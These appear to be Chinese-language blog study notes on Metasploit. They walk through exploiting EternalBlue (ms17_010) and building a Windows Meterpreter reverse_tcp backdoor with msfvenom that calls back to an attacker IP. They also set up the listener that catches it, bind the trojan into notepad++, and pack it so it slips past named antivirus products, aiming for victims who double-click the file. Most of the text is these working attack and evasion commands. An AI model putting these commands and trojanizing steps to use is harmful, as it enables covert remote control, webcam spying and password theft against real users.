msf

MSF——基本使用和Exploit模块（一） – 走看看 (zoukankan.com)

1、介绍

matasploit，简称msf，是一款开源安全漏洞利用和测试工具，集成了 各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。

msfconsole

2、永恒之蓝

永恒之蓝 2017年4月4日 黑客团体Brokeers影子经纪人 网络攻击工具
利用windows系统的smb漏洞可以获取系统最高权限
5月12日 出现基于此的wanacry勒索病毒

3、使用模块

有上千个模块，搜索语法

search ms17_010
//exploit 攻击脚本
//auxiliary 辅助脚本，测试漏洞是否存在

use 编号
use 全称

//查看设置
show options或者options
# 设置参数
set RHOSTS 192.168.2.129
# payload option攻击载荷，指的是目标的操作系统，主要是32和64，最新版msf是默认64
# LHOST 监听地址，即运行msf的主机
# LPORT msf使用端口
# set lport 60000

# 攻击
run
# meterpreter标识，标识攻击成功

MSDN, 我告诉你 – 做一个安静的工具站 (itellyou.cn)，一个windows的镜像资源站点，其中的操作系统是原生纯净的，没有任何补丁。

4、后门

meterpreter是强大的后渗透模块

help //在meterpreter标识输入，获取帮助信息

远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统

msfvenom是用来生成后门的软件，在目标上执行后门，在本地监听上线。

msfvenom在shell里使用，不是msfconsole终端

病毒分为破坏性的和共存性的

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe

• -p payload
• 系统/架构/作用/方式
• 本地ip和本地端口，是自主设置的
• -f format
• 作用之后生成文件

一般会被防火墙过滤，需要免杀

5、

use exploit/multi/handler
//三个必须的设置，需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run

用户双击exe运行之后，攻击者就会收到。

6、权限维持和二次

7、免杀

捆绑木马：下载正常程序，然后捆绑，当用户收到软件执行后会触发。

（可以绕过火绒，但无法绕过对文件校验的360.且需要注意国内程序默认一般是32，无法植入64位的木马）

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe

加壳：本身是保护软件不被反编译，不被抄袭。分为压缩壳、加密壳

通过加壳软件使用，比如themida